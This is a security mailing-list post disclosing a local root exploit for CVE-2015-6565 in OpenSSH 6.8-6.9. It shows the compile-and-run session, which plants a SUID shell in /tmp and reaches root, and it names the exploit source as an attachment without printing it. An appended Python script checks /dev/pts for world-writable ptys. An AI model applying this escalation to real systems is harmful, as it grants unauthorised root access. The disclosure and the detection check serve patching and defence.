Date: Thu, 26 Jan 2017 10:07:24 +0100
Subject: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux

Hi list,

I know I'm late to the party, but I was bored, so I decided to write
an exploit for CVE-2015-6565, which affects OpenSSH 6.8-6.9.
It is mostly considered to be a "DoS", even though Jann Horn publicly
told how it could be exploited for local privilege escalation, but I
guess it's either PoC||GTFO for users to update.


"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY
devices, which allows local users to cause a denial of service
(terminal disruption) or possibly have unspecified other impact by
writing to a device, as demonstrated by writing an escape sequence."

I think the description should be updated.

$ gcc not_an_sshnuke.c -o not_an_sshnuke
$ ./not_an_sshnuke /dev/pts/3
[*] Waiting for slave device /dev/pts/3
[+] Got PTY slave /dev/pts/3
[+] Making PTY slave the controlling terminal
[+] SUID shell at /tmp/sh
$ /tmp/sh --norc --noprofile -p
# id
euid=0(root) groups=0(root)

Federico Bento.

This message was sent using IMP, the Internet Messaging Program.

Attachment: "not_an_sshnuke.c" (text/x-csrc, 2039 bytes)
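A defender-side check for the symptom quoted above, added here as an example and not part of Federico's message or the OpenSSH project: it walks /dev/pts and flags pty slaves that are world-writable, which is the condition CVE-2015-6565 introduced. The 0620 owner-rw/group-w layout used as the sane baseline is an assumption about a typical Linux setup with a `tty` group.

```python
import os
import stat
from typing import Dict, List


def tty_mode_findings(mode: int) -> List[str]:
    """Return human-readable problems with a pty slave's permission bits.

    `mode` is the st_mode value returned by os.stat(). Assumed sane
    layout is 0620: owner read/write, group write (for write(1)/wall(1)
    via the tty group), nothing for 'other'. Any 'other' bit is flagged;
    the world-writable bit is the one CVE-2015-6565 left set.
    """
    perm = stat.S_IMODE(mode)
    findings: List[str] = []
    if perm & stat.S_IWOTH:
        findings.append("world-writable (CVE-2015-6565 symptom)")
    if perm & stat.S_IROTH:
        findings.append("world-readable")
    if perm & stat.S_IXOTH:
        findings.append("world-executable")
    return findings


def scan_pts(pts_dir: str = "/dev/pts") -> Dict[str, List[str]]:
    """Stat every pty slave under pts_dir and map path -> findings.

    Only character devices are considered, and /dev/pts/ptmx (the
    multiplexer, legitimately 0666) is skipped.
    """
    results: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(pts_dir)):
        if name == "ptmx":
            continue
        path = os.path.join(pts_dir, name)
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            continue  # session closed between listdir() and lstat()
        if not stat.S_ISCHR(st.st_mode):
            continue
        findings = tty_mode_findings(st.st_mode)
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    bad = scan_pts()
    for path, findings in bad.items():
        print(f"[!] {path}: {', '.join(findings)}")
    if not bad:
        print("[+] no world-accessible pty slaves found")
```

Run it as any local user on a host running sshd; a hit on a pty that belongs to another user's session means that session is exposed to the attack described above and sshd should be upgraded past 6.9.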
